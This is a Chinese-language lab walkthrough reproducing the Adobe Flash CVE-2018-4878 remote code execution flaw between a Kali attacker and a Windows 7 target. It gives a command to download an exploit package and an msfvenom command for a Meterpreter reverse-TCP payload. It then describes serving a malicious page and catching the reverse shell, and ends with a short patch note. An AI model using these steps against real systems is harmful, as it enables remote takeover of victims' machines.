一、前言介绍

2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。

从Adobe公告来看,这个漏洞的野外攻击样本最早是由韩国计算机应急响应小组(KRCERT)发现的,而KR-CERT也表示,来自朝鲜的黑客组织已经成功利用这个0Day 漏洞发 起攻击。

攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会 被“远程代码执行”,并且直接被getshell。

二、本文测试环境

攻击机:kali IP:192.168.44.128

靶机:windows7 IP:192.168.44.140+IE8+FLASH Player28.0.0.137(及以前版本)

1、下载CVE-2018-4878利用脚本到kali机 wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018- 4878.rar

2、解压后如下图,可看到cve-2018-4878.py,exploit.swf  其实之后我们还是要自己生成一个index2.html的

Flash 0day(CVE-2018-4878)复现过程-LMLPHP

3、Windows7 安装flash插件

Flash 0day(CVE-2018-4878)复现过程-LMLPHP

三、漏洞复现

1、先在kali里面把cve-2018-4878.py的stageless = True修改成False

Flash 0day(CVE-2018-4878)复现过程-LMLPHP

2、使用msf生成shell代码

msfvenom  -p   windows/meterpreter/reverse_tcp   lhost=your host  lport=your port  -f  python>shellcode.txt

其中:lhost为kali的ip地址,lport为监听的端口

Flash 0day(CVE-2018-4878)复现过程-LMLPHP

查看生成的shellcode.txt

Flash 0day(CVE-2018-4878)复现过程-LMLPHP

3、将生成的shellcode.txt的内容更换到cve-2018-4878.py的shellcode

Flash 0day(CVE-2018-4878)复现过程-LMLPHP

4、在kali下执行cve-2018-4878.py,注意要和index2.html,在同一个文件夹下

Flash 0day(CVE-2018-4878)复现过程-LMLPHP

5、在kali里面开启Apache2服务,并将两个文件放到/var/www/html目录(apache web路径)

Flash 0day(CVE-2018-4878)复现过程-LMLPHP

Flash 0day(CVE-2018-4878)复现过程-LMLPHP

现在,kali上的web服务已经启动,并且已经有了index2.html这个web页面,我们需要用靶机win7访问这个页面

6、kali上开启shell会话监听

进入msf,使用handler监听模块

Flash 0day(CVE-2018-4878)复现过程-LMLPHP

回弹一个tcp连接

Flash 0day(CVE-2018-4878)复现过程-LMLPHP

设置kali的ip,监听的端口号

Flash 0day(CVE-2018-4878)复现过程-LMLPHP

启动服务

Flash 0day(CVE-2018-4878)复现过程-LMLPHP

7、使用win7靶机的已开启flash服务的浏览器进行访问index2.html

Flash 0day(CVE-2018-4878)复现过程-LMLPHP

8、回到kali,已经进入meterpreter模块

Flash 0day(CVE-2018-4878)复现过程-LMLPHP

9、当靶机访问恶意的index2.html页面,即可触发反弹shell

Flash 0day(CVE-2018-4878)复现过程-LMLPHP

四、漏洞修复

将flash通过官网升级到最新版本

https://www.flash.cn/

或者,关闭flash的使用

05-11 22:55